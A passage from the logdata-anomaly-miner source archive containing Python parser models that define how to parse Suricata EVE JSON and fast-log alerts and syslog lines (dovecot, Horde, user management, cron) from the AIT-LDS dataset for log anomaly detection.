b'"state":"'), DelimitedDataModelElement("state", b'"'), FixedDataModelElement("stored_str", b'","stored":'), FixedWordlistDataModelElement("stored", [b"true", b"false"]), FixedDataModelElement("size_str", b',"size":'), DecimalIntegerValueModelElement("size"), FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), FixedDataModelElement("brack_str", b"}}") ]), ]), SequenceModelElement("stats", [ FixedDataModelElement("stats_str", b'stats",'), FixedDataModelElement("uptime_str", b'"stats":{"uptime":'), DecimalIntegerValueModelElement("uptime"), SequenceModelElement("capture", [ FixedDataModelElement("capture_str", b',"capture":{'), FixedDataModelElement("kernel_packets_str", b'"kernel_packets":'), DecimalIntegerValueModelElement("kernel_packets"), FixedDataModelElement("kernel_drops_str", b',"kernel_drops":'), DecimalIntegerValueModelElement("kernel_drops"), FixedDataModelElement("brack_str", b"}") ]), SequenceModelElement("decoder", [ FixedDataModelElement("pkts_str", b',"decoder":{"pkts":'), DecimalIntegerValueModelElement("pkts"), FixedDataModelElement("bytes_str", b',"bytes":'), DecimalIntegerValueModelElement("bytes"), FixedDataModelElement("invalid_str", b',"invalid":'), DecimalIntegerValueModelElement("invalid"), FixedDataModelElement("ipv4_str", b',"ipv4":'), DecimalIntegerValueModelElement("ipv4"), FixedDataModelElement("ipv6_str", b',"ipv6":'), DecimalIntegerValueModelElement("ipv6"), FixedDataModelElement("ethernet_str", b',"ethernet":'), DecimalIntegerValueModelElement("ethernet"), FixedDataModelElement("raw_str", b',"raw":'), DecimalIntegerValueModelElement("raw"), FixedDataModelElement("null_str", b',"null":'), DecimalIntegerValueModelElement("null"), FixedDataModelElement("sll_str", b',"sll":'), DecimalIntegerValueModelElement("sll"), FixedDataModelElement("tcp_str", b',"tcp":'), DecimalIntegerValueModelElement("tcp"), FixedDataModelElement("udp_str", b',"udp":'), DecimalIntegerValueModelElement("udp"), FixedDataModelElement("sctp_str", b',"sctp":'), DecimalIntegerValueModelElement("sctp"), FixedDataModelElement("icmpv4_str", b',"icmpv4":'), DecimalIntegerValueModelElement("icmpv4"), FixedDataModelElement("icmpv6_str", b',"icmpv6":'), DecimalIntegerValueModelElement("icmpv6"), FixedDataModelElement("ppp_str", b',"ppp":'), DecimalIntegerValueModelElement("ppp"), FixedDataModelElement("pppoe_str", b',"pppoe":'), DecimalIntegerValueModelElement("pppoe"), FixedDataModelElement("gre_str", b',"gre":'), DecimalIntegerValueModelElement("gre"), FixedDataModelElement("vlan_str", b',"vlan":'), DecimalIntegerValueModelElement("vlan"), FixedDataModelElement("vlan_qinq_str", b',"vlan_qinq":'), DecimalIntegerValueModelElement("vlan_qinq"), FixedDataModelElement("teredo_str", b',"teredo":'), DecimalIntegerValueModelElement("teredo"), FixedDataModelElement("ipv4_in_ipv6_str", b',"ipv4_in_ipv6":'), DecimalIntegerValueModelElement("ipv4_in_ipv6"), FixedDataModelElement("ipv6_in_ipv6_str", b',"ipv6_in_ipv6":'), DecimalIntegerValueModelElement("ipv6_in_ipv6"), FixedDataModelElement("mpls_str", b',"mpls":'), DecimalIntegerValueModelElement("mpls"), FixedDataModelElement("avg_pkt_size_str", b',"avg_pkt_size":'), DecimalIntegerValueModelElement("avg_pkt_size"), FixedDataModelElement("max_pkt_size_str", b',"max_pkt_size":'), DecimalIntegerValueModelElement("max_pkt_size"), FixedDataModelElement("erspan_str", b',"erspan":'), DecimalIntegerValueModelElement("erspan"), SequenceModelElement("ipraw", [ FixedDataModelElement("invalid_ip_version_str", b',"ipraw":{"invalid_ip_version":'), DecimalIntegerValueModelElement("invalid_ip_version"), ]), SequenceModelElement("ltnull", [ FixedDataModelElement("ipraw_pkt_too_small_str", b'},"ltnull":{"pkt_too_small":'), DecimalIntegerValueModelElement("ipraw_pkt_too_small"), FixedDataModelElement("unsupported_type", b',"unsupported_type":'), DecimalIntegerValueModelElement("unsupported_type"), ]), SequenceModelElement("dce", [ FixedDataModelElement("dce_pkt_too_small_str", b'},"dce":{"pkt_too_small":'), DecimalIntegerValueModelElement("dce_pkt_too_small"), FixedDataModelElement("brack_str", b"}") ]) ]), SequenceModelElement("flow", [ FixedDataModelElement("memcap_str", b'},"flow":{"memcap":'), DecimalIntegerValueModelElement("memcap"), FixedDataModelElement("spare_str", b',"spare":'), DecimalIntegerValueModelElement("spare"), FixedDataModelElement("emerg_mode_entered_str", b',"emerg_mode_entered":'), DecimalIntegerValueModelElement("emerg_mode_entered"), FixedDataModelElement("emerg_mode_over_str", b',"emerg_mode_over":'), DecimalIntegerValueModelElement("emerg_mode_over"), FixedDataModelElement("tcp_reuse_str", b',"tcp_reuse":'), DecimalIntegerValueModelElement("tcp_reuse"), FixedDataModelElement("memuse_str", b',"memuse":'), DecimalIntegerValueModelElement("memuse"), ]), SequenceModelElement("defrag", [ SequenceModelElement("ipv4", [ FixedDataModelElement("fragments_str", b'},"defrag":{"ipv4":{"fragments":'), DecimalIntegerValueModelElement("fragments"), FixedDataModelElement("reassembled_str", b',"reassembled":'), DecimalIntegerValueModelElement("reassembled_str"), FixedDataModelElement("timeouts_str", b',"timeouts":'), DecimalIntegerValueModelElement("timeouts"), ]), SequenceModelElement("ipv6", [ FixedDataModelElement("fragments_str", b'},"ipv6":{"fragments":'), DecimalIntegerValueModelElement("fragments"), FixedDataModelElement("reassembled_str", b',"reassembled":'), DecimalIntegerValueModelElement("reassembled_str"), FixedDataModelElement("timeouts_str", b',"timeouts":'), DecimalIntegerValueModelElement("timeouts"), ]), FixedDataModelElement("max_frag_hits_str", b'},"max_frag_hits":'), DecimalIntegerValueModelElement("max_frag_hits"), ]), SequenceModelElement("tcp", [ FixedDataModelElement("sessions_str", b'},"tcp":{"sessions":'), DecimalIntegerValueModelElement("sessions"), FixedDataModelElement("ssn_memcap_drop_str", b',"ssn_memcap_drop":'), DecimalIntegerValueModelElement("ssn_memcap_drop"), FixedDataModelElement("pseudo_str", b',"pseudo":'), DecimalIntegerValueModelElement("pseudo"), FixedDataModelElement("pseudo_failed_str", b',"pseudo_failed":'), DecimalIntegerValueModelElement("pseudo_failed"), FixedDataModelElement("invalid_checksum_str", b',"invalid_checksum":'), DecimalIntegerValueModelElement("invalid_checksum"), FixedDataModelElement("no_flow_str", b',"no_flow":'), DecimalIntegerValueModelElement("no_flow"), FixedDataModelElement("syn_str", b',"syn":'), DecimalIntegerValueModelElement("syn"), FixedDataModelElement("synack_str", b',"synack":'), DecimalIntegerValueModelElement("synack"), FixedDataModelElement("rst_str", b',"rst":'), DecimalIntegerValueModelElement("rst"), FixedDataModelElement("segment_memcap_drop_str", b',"segment_memcap_drop":'), DecimalIntegerValueModelElement("segment_memcap_drop"), FixedDataModelElement("stream_depth_reached_str", b',"stream_depth_reached":'), DecimalIntegerValueModelElement("stream_depth_reached"), FixedDataModelElement("reassembly_gap_str", b',"reassembly_gap":'), DecimalIntegerValueModelElement("reassembly_gap"), FixedDataModelElement("memuse_str", b',"memuse":'), DecimalIntegerValueModelElement("memuse"), FixedDataModelElement("reassembly_memuse_str", b',"reassembly_memuse":'), DecimalIntegerValueModelElement("reassembly_memuse"), ]), SequenceModelElement("detect", [ FixedDataModelElement("alert_str", b'},"detect":{"alert":'), DecimalIntegerValueModelElement("alert") ]), SequenceModelElement("app_layer", [ SequenceModelElement("flow", [ FixedDataModelElement("http_str", b'},"app_layer":{"flow":{"http":'), DecimalIntegerValueModelElement("http"), FixedDataModelElement("ftp_str", b',"ftp":'), DecimalIntegerValueModelElement("ftp"), FixedDataModelElement("smtp_str", b',"smtp":'), DecimalIntegerValueModelElement("smtp"), FixedDataModelElement("tls_str", b',"tls":'), DecimalIntegerValueModelElement("tls"), FixedDataModelElement("ssh_str", b',"ssh":'), DecimalIntegerValueModelElement("ssh"), FixedDataModelElement("imap_str", b',"imap":'), DecimalIntegerValueModelElement("imap"), FixedDataModelElement("msn_str", b',"msn":'), DecimalIntegerValueModelElement("msn"), FixedDataModelElement("smb_str", b',"smb":'), DecimalIntegerValueModelElement("smb"), FixedDataModelElement("dcerpc_tcp_str", b',"dcerpc_tcp":'), DecimalIntegerValueModelElement("dcerpc_tcp"), FixedDataModelElement("dns_tcp_str", b',"dns_tcp":'), DecimalIntegerValueModelElement("dns_tcp"), FixedDataModelElement("failed_tcp_str", b',"failed_tcp":'), DecimalIntegerValueModelElement("failed_tcp"), FixedDataModelElement("dcerpc_udp_str", b',"dcerpc_udp":'), DecimalIntegerValueModelElement("dcerpc_udp"), FixedDataModelElement("dns_udp_str", b',"dns_udp":'), DecimalIntegerValueModelElement("dns_udp"), FixedDataModelElement("failed_udp_str", b',"failed_udp":'), DecimalIntegerValueModelElement("failed_udp"), ]), SequenceModelElement("tx", [ FixedDataModelElement("http_str", b'},"tx":{"http":'), DecimalIntegerValueModelElement("http"), FixedDataModelElement("smtp_str", b',"smtp":'), DecimalIntegerValueModelElement("smtp"), FixedDataModelElement("tls_str", b',"tls":'), DecimalIntegerValueModelElement("tls"), FixedDataModelElement("dns_tcp_str", b',"dns_tcp":'), DecimalIntegerValueModelElement("dns_tcp"), FixedDataModelElement("dns_udp_str", b',"dns_udp":'), DecimalIntegerValueModelElement("dns_udp"), ]) ]), SequenceModelElement("flow_mgr", [ FixedDataModelElement("closed_pruned_str", b'}},"flow_mgr":{"closed_pruned":'), DecimalIntegerValueModelElement("closed_pruned"), FixedDataModelElement("new_pruned_str", b',"new_pruned":'), DecimalIntegerValueModelElement("new_pruned"), FixedDataModelElement("est_pruned_str", b',"est_pruned":'), DecimalIntegerValueModelElement("est_pruned"), FixedDataModelElement("bypassed_pruned_str", b',"bypassed_pruned":'), DecimalIntegerValueModelElement("bypassed_pruned"), FixedDataModelElement("flows_checked_str", b',"flows_checked":'), DecimalIntegerValueModelElement("flows_checked"), FixedDataModelElement("flows_notimeout_str", b',"flows_notimeout":'), DecimalIntegerValueModelElement("flows_notimeout"), FixedDataModelElement("flows_timeout_str", b',"flows_timeout":'), DecimalIntegerValueModelElement("flows_timeout"), FixedDataModelElement("flows_timeout_inuse_str", b',"flows_timeout_inuse":'), DecimalIntegerValueModelElement("flows_timeout_inuse"), FixedDataModelElement("flows_removed_str", b',"flows_removed":'), DecimalIntegerValueModelElement("flows_removed"), FixedDataModelElement("rows_checked_str", b',"rows_checked":'), DecimalIntegerValueModelElement("rows_checked"), FixedDataModelElement("rows_skipped_str", b',"rows_skipped":'), DecimalIntegerValueModelElement("rows_skipped"), FixedDataModelElement("rows_empty_str", b',"rows_empty":'), DecimalIntegerValueModelElement("rows_empty"), FixedDataModelElement("rows_busy_str", b',"rows_busy":'), DecimalIntegerValueModelElement("rows_busy"), FixedDataModelElement("rows_maxlen_str", b',"rows_maxlen":'), DecimalIntegerValueModelElement("rows_maxlen"), ]), SequenceModelElement("dns", [ FixedDataModelElement("memuse_str", b'},"dns":{"memuse":'), DecimalIntegerValueModelElement("memuse"), FixedDataModelElement("memcap_state_str", b',"memcap_state":'), DecimalIntegerValueModelElement("memcap_state"), FixedDataModelElement("memcap_global_str", b',"memcap_global":'), DecimalIntegerValueModelElement("memcap_global"), ]), SequenceModelElement("http", [ FixedDataModelElement("memuse_str", b'},"http":{"memuse":'), DecimalIntegerValueModelElement("memuse"), FixedDataModelElement("memcap_str", b',"memcap":'), DecimalIntegerValueModelElement("memcap"), ]), FixedDataModelElement("quote_str", b"}}}") ]), SequenceModelElement("tls", [ FixedDataModelElement("tls_str", b'tls",'), conn, SequenceModelElement("tls", [ FixedDataModelElement("subject_str", b',"tls":{"subject":"'), DelimitedDataModelElement("subject", b'"'), FixedDataModelElement("issuerdn_str", b'","issuerdn":"'), DelimitedDataModelElement("issuerdn", b'"'), FixedDataModelElement("fingerprint_str", b'","fingerprint":"'), DelimitedDataModelElement("fingerprint", b'"'), OptionalMatchModelElement( "sni", SequenceModelElement("sni", [ FixedDataModelElement("sni_str", b'","sni":"'), DelimitedDataModelElement("sni", b'"'), ]) ), FixedDataModelElement("version_str", b'","version":"'), DelimitedDataModelElement("version", b'"'), FixedDataModelElement("notbefore_str", b'","notbefore":"'), DelimitedDataModelElement("notbefore", b'"'), FixedDataModelElement("notafter_str", b'","notafter":"'), DelimitedDataModelElement("notafter", b'"'), ]), FixedDataModelElement("brack_str", b'"}}') ]), SequenceModelElement("alert", [ FixedDataModelElement("alert_str", b'alert",'), conn, OptionalMatchModelElement( "tx_id", SequenceModelElement("tx_id", [ FixedDataModelElement("tx_id", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), ])), SequenceModelElement("alert", [ FixedDataModelElement("action_str", b',"alert":{"action":"'), DelimitedDataModelElement("action", b'"'), FixedDataModelElement("gid_str", b'","gid":'), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("signature_id_str", b',"signature_id":'), DecimalIntegerValueModelElement("signature_id"), FixedDataModelElement("rev_str", b',"rev":'), DecimalIntegerValueModelElement("rev"), FixedDataModelElement("signature_str", b',"signature":"'), DelimitedDataModelElement("signature", b'"'), FixedDataModelElement("category_str", b'","category":"'), DelimitedDataModelElement("category", b'"'), FixedDataModelElement("severity_str", b'","severity":'), DecimalIntegerValueModelElement("severity"), FixedDataModelElement("brack_str", b"}") ]), http, FixedDataModelElement("brack_str", b"}") ]), ]) ]) return model SuricataFastParsingModel.py000066400000000000000000000035341437606560100336200ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement def get_model(): """Return a model to parse Suricata Fast logs from the AIT-LDS.""" model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%m/%d/%Y-%H:%M:%S.%f"), FixedDataModelElement("brack_str1", b" [**] ["), DecimalIntegerValueModelElement("id1"), FixedDataModelElement("sep1", b":"), DecimalIntegerValueModelElement("id2"), FixedDataModelElement("sep2", b":"), DecimalIntegerValueModelElement("id3"), FixedDataModelElement("sep3", b"] "), DelimitedDataModelElement("message", b" [**] "), FixedDataModelElement("classification_str", b" [**] [Classification: "), DelimitedDataModelElement("classification", b"]"), FixedDataModelElement("priority_str", b"] [Priority: "), DecimalIntegerValueModelElement("priority"), FixedDataModelElement("brack_str1", b"] {"), DelimitedDataModelElement("conn", b"}"), FixedDataModelElement("brack_str2", b"} "), IpAddressDataModelElement("src_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("src_port"), FixedDataModelElement("arrow_str", b" -> "), IpAddressDataModelElement("dst_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("dst_port"), ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds/SyslogParsingModel.py000066400000000000000000001623711437606560100325730ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement def get_model(): """Return a model to parse Syslogs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" user_info = SequenceModelElement("user_info", [ FixedDataModelElement("user_str", b"user=<"), OptionalMatchModelElement( "user", DelimitedDataModelElement("user", b">") ), FixedDataModelElement("method_str", b">"), OptionalMatchModelElement( "method", SequenceModelElement("method", [ FixedDataModelElement("method_str", b", method="), DelimitedDataModelElement("method", b","), ]) ), FixedDataModelElement("rip_str", b", rip="), IpAddressDataModelElement("rip"), FixedDataModelElement("lip_str", b", lip="), IpAddressDataModelElement("lip"), OptionalMatchModelElement( "mpid", SequenceModelElement("mpid", [ FixedDataModelElement("mpid_str", b", mpid="), DecimalIntegerValueModelElement("mpid"), ]) ), OptionalMatchModelElement( "secured", FixedDataModelElement("secured_str", b", secured") ), OptionalMatchModelElement( "tls", FixedDataModelElement("tls_str", b", TLS") ), OptionalMatchModelElement( "handshaking", SequenceModelElement("seq", [ FixedDataModelElement("handshaking_str", b" handshaking:"), DelimitedDataModelElement("msg", b", session=<") ]) ), FixedDataModelElement("session_str", b", session=<"), DelimitedDataModelElement("session", b">"), FixedDataModelElement("bracket_str", b">"), ]) model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%b %d %H:%M:%S", start_year=2020), FixedDataModelElement("sp1", b" "), DelimitedDataModelElement("host", b" "), FirstMatchModelElement("service", [ SequenceModelElement("dovecot", [ FixedDataModelElement("dovecot_str", b" dovecot: "), FirstMatchModelElement("imap", [ SequenceModelElement("imap", [ FixedDataModelElement("imap_str", b"imap("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket_str", b"): "), FirstMatchModelElement("message", [ SequenceModelElement("logout", [ FixedDataModelElement("logout_str", b"Logged out in="), DecimalIntegerValueModelElement("in"), FixedDataModelElement("out_str", b" out="), DecimalIntegerValueModelElement("out") ]), SequenceModelElement("err_mail", [ FixedDataModelElement("mail_str", b"Error: Failed to autocreate mailbox INBOX: Internal error occurred. " b"Refer to server log for more information. ["), DelimitedDataModelElement("err_time", b"]"), FixedDataModelElement("brack", b"]") ]), SequenceModelElement("err_open", [ FixedDataModelElement("err_str", b"Error: "), DelimitedDataModelElement("function_name", b"("), FixedDataModelElement("brack_str1", b"("), DelimitedDataModelElement("arg", b")"), FixedDataModelElement("failed_str", b") failed: Permission denied (euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("brack_str2", b"("), DelimitedDataModelElement("euid_user", b")"), FixedDataModelElement("egid_str", b") egid="), DecimalIntegerValueModelElement("egid"), FixedDataModelElement("brack_str3", b"("), DelimitedDataModelElement("egid_user", b")"), FixedDataModelElement("perm_str", b") missing +w perm: "), DelimitedDataModelElement("mail_path", b","), FixedDataModelElement("group_str", b", we're not in group "), DecimalIntegerValueModelElement("group_id"), FixedDataModelElement("brack_str4", b"("), DelimitedDataModelElement("group_name", b")"), FixedDataModelElement("owned_str", b"), dir owned by "), DelimitedDataModelElement("owner", b" "), FixedDataModelElement("mode_str", b" mode="), DelimitedDataModelElement("mode", b")"), FixedDataModelElement("brack_str5", b")"), OptionalMatchModelElement( "set", SequenceModelElement("set", [ FixedDataModelElement("set_str", b" (set"), DelimitedDataModelElement("param", b"="), FixedDataModelElement("equal_str", b"="), DelimitedDataModelElement("val", b")"), FixedDataModelElement("brack_str6", b")") ]) ) ]), SequenceModelElement("err_mail", [ FixedDataModelElement("mail_str", b"Failed to autocreate mailbox INBOX: Internal error occurred. " b"Refer to server log for more information. ["), DelimitedDataModelElement("err_time", b"]"), FixedDataModelElement("brack", b"]") ]), ]), ]), SequenceModelElement("imap_login", [ FixedDataModelElement("imap_login_str", b"imap-login: "), FirstMatchModelElement("login", [ SequenceModelElement("disconnected_str", [ FixedDataModelElement("disconnected_str", b"Disconnected "), FirstMatchModelElement("auth", [ SequenceModelElement("auth_failed", [ FixedDataModelElement("auth_failed_str", b"(auth failed, "), DecimalIntegerValueModelElement("attempts"), FixedDataModelElement("attempts_str", b" attempts in "), ]), FixedDataModelElement("no_auth_str", b"(no auth attempts in "), FixedDataModelElement("no_auth_str", b"(disconnected before auth was ready, waited "), ]), DecimalIntegerValueModelElement("duration"), FixedDataModelElement("secs_str", b" secs): "), user_info ]), SequenceModelElement("login", [ FixedDataModelElement("login_str", b"Login: "), user_info ]), SequenceModelElement("anvil", [ FixedDataModelElement("anvil_str", b"Error: anvil:"), AnyByteDataModelElement("anvil_msg") ]), SequenceModelElement("auth_responding", [ FixedDataModelElement("auth_responding_str", b"Warning: Auth process not responding, " b"delayed sending initial response (greeting): "), user_info ]), ]), ]), SequenceModelElement("auth", [ FixedDataModelElement("auth_worker_str", b"auth: "), AnyByteDataModelElement("message") ]), SequenceModelElement("auth_worker", [ FixedDataModelElement("auth_worker_str", b"auth-worker("), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack", b"):"), AnyByteDataModelElement("message") ]), SequenceModelElement("master", [ FixedDataModelElement("master_str", b"master: "), AnyByteDataModelElement("message") ]), SequenceModelElement("ssl_params", [ FixedDataModelElement("ssl_params_str", b"ssl-params: "), AnyByteDataModelElement("message") ]), SequenceModelElement("log", [ FixedDataModelElement("log_str", b"log: "), AnyByteDataModelElement("message") ]), ]) ]), SequenceModelElement("dovecot2", [ FixedDataModelElement("dovecot_str", b" dovecot["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("bracket", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("warning", [ FixedDataModelElement("log_str", b"Warning: "), AnyByteDataModelElement("message") ]), ]) ]), SequenceModelElement("chfn", [ FixedDataModelElement("chfn_str", b" chfn["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_user", b"changed user '"), DelimitedDataModelElement("user", b"'"), FixedDataModelElement("information_str", b"' information") ]), SequenceModelElement("horde", [ FixedDataModelElement("horde_str", b" HORDE: "), FirstMatchModelElement("horde", [ SequenceModelElement("imp", [ FixedDataModelElement("succ_str", b"[imp] "), FirstMatchModelElement("imp", [ SequenceModelElement("login", [ FixedDataModelElement("succ_str", b"Login success for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), DelimitedDataModelElement("ip", b")"), OptionalMatchModelElement( "fwd", SequenceModelElement( "seq", [ FixedDataModelElement("brack_str2", b") ("), DelimitedDataModelElement("forward", b")"), ]) ), FixedDataModelElement("to_str", b") to {"), DelimitedDataModelElement("imap_addr", b"}"), FixedDataModelElement("brack_str3", b"}"), ]), SequenceModelElement("message_sent", [ FixedDataModelElement("message_sent_str", b"Message sent to "), DelimitedDataModelElement('recepients', b' from'), FixedDataModelElement("from_str", b" from "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("login_failed", [ FixedDataModelElement("succ_str", b"FAILED LOGIN for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), IpAddressDataModelElement("ip"), FixedDataModelElement("to_str", b") to {"), DelimitedDataModelElement("imap_addr", b"}"), FixedDataModelElement("brack_str2", b"}"), ]), SequenceModelElement("status", [ FixedDataModelElement("status_str", b'[status] Could not open mailbox "INBOX".'), ]), SequenceModelElement("sync_token", [ FixedDataModelElement("sync_token_str", b"[getSyncToken] IMAP error reported by server."), ]), SequenceModelElement("auth_failed", [ FixedDataModelElement("bracket", b"["), DelimitedDataModelElement("type", b"]"), FixedDataModelElement("auth_failed_str", b"] Authentication failed."), ]), ]), ]), SequenceModelElement("horde", [ FixedDataModelElement("succ_str", b"[horde] "), FirstMatchModelElement("horde", [ SequenceModelElement("success", [ FixedDataModelElement("success_str", b"Login success for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" to horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("success", [ FixedDataModelElement("success_str", b"User "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" logged out of Horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("login_failed", [ FixedDataModelElement("failed_str", b"FAILED LOGIN for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("to_horde_str", b" to horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str", b")"), ]), ]) ]), SequenceModelElement("function", [ FixedWordlistDataModelElement("horde_function", [b"[nag]", b"[turba]", b"[horde]"]), FixedDataModelElement("nag_str", b" PHP ERROR: "), FirstMatchModelElement("php_error", [ SequenceModelElement("declaration", [ FixedDataModelElement("declaration_str", b"Declaration of "), DelimitedDataModelElement("function_name1", b"("), FixedDataModelElement("brack_str1", b"("), OptionalMatchModelElement( "arg1", DelimitedDataModelElement("arg1", b")") ), FixedDataModelElement("failed_str", b") should be compatible with "), DelimitedDataModelElement("function_name2", b"("), FixedDataModelElement("brack_str2", b"("), OptionalMatchModelElement( "arg2", DelimitedDataModelElement("arg2", b")") ), FixedDataModelElement("brack_str3", b")"), ]), FixedDataModelElement("file_str", b"finfo_file(): Empty filename or path"), FixedDataModelElement("header_str", b"Cannot modify header information - headers already sent") ]) ]), SequenceModelElement("guest", [ FixedDataModelElement("guest_str", b"Guest user is not authorized for Horde (Host: "), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str", b").") ]), SequenceModelElement("php_error", [ FixedDataModelElement("php_error_str", b"PHP ERROR: "), DelimitedDataModelElement("msg", b" ["), ]), SequenceModelElement("free_msg", [ DelimitedDataModelElement("msg", b" ["), ]) ]), FixedDataModelElement("to_str", b" [pid "), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("line_str", b" on line "), DecimalIntegerValueModelElement("line"), FixedDataModelElement("of_str", b' of "'), DelimitedDataModelElement("path", b'"'), FixedDataModelElement("brack_str", b'"]') ]), SequenceModelElement("useradd", [ FixedDataModelElement("useradd_str", b" useradd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("useradd", [ SequenceModelElement("cmd", [ FixedDataModelElement("add_str", b"add '"), DelimitedDataModelElement("user", b"'"), FixedDataModelElement("cmd_str", b"' to "), OptionalMatchModelElement("shadow", FixedDataModelElement("shadow", b"shadow ")), FixedDataModelElement("group_str", b"group '"), DelimitedDataModelElement("group", b"'"), FixedDataModelElement("quote_str", b"'") ]), SequenceModelElement("new_user", [ FixedDataModelElement("new_user", b"new user: name="), DelimitedDataModelElement("user", b","), FixedDataModelElement("uid_str", b", UID="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("home_str", b", home="), DelimitedDataModelElement("home", b","), FixedDataModelElement("shell_str", b", shell="), VariableByteDataModelElement("shell", alphabet) ]), SequenceModelElement("new_group", [ FixedDataModelElement("new_group", b"new group: name="), DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]) ]) ]), SequenceModelElement("groupadd", [ FixedDataModelElement("groupadd_str", b" groupadd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("useradd", [ SequenceModelElement("cmd", [ FixedDataModelElement("add_str", b"group added to "), DelimitedDataModelElement("path", b":"), FixedDataModelElement("cmd_str", b": name="), FirstMatchModelElement("fm", [ SequenceModelElement("gid", [ DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]), AnyByteDataModelElement("group") ]) ]), SequenceModelElement("new_user", [ FixedDataModelElement("new_user", b"new user: name="), DelimitedDataModelElement("user", b","), FixedDataModelElement("uid_str", b", UID="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("home_str", b", home="), DelimitedDataModelElement("home", b","), FixedDataModelElement("shell_str", b", shell="), VariableByteDataModelElement("shell", alphabet) ]), SequenceModelElement("new_group", [ FixedDataModelElement("new_group", b"new group: name="), DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]) ]) ]), SequenceModelElement("chpasswd", [ FixedDataModelElement("chpasswd_str", b" chpasswd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("pw_changed", b"): password changed for "), AnyByteDataModelElement("user") ]), SequenceModelElement("usermod", [ FixedDataModelElement("usermod_str", b" usermod["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_str", b"change user '"), DelimitedDataModelElement("user", b"'"), FixedDataModelElement("pw_str", b"' password") ]), SequenceModelElement("chage", [ FixedDataModelElement("usermod_str", b" chage["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_str", b"changed password expiry for "), AnyByteDataModelElement("user") ]), SequenceModelElement("cron", [ FixedWordlistDataModelElement("cron_str", [b" CRON[", b" cron["]), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("cron", [ SequenceModelElement("cmd", [ FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("cmd_str", b") CMD "), AnyByteDataModelElement("cmd_msg") ]), SequenceModelElement("session", [ # This only occurs in auth.log DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", 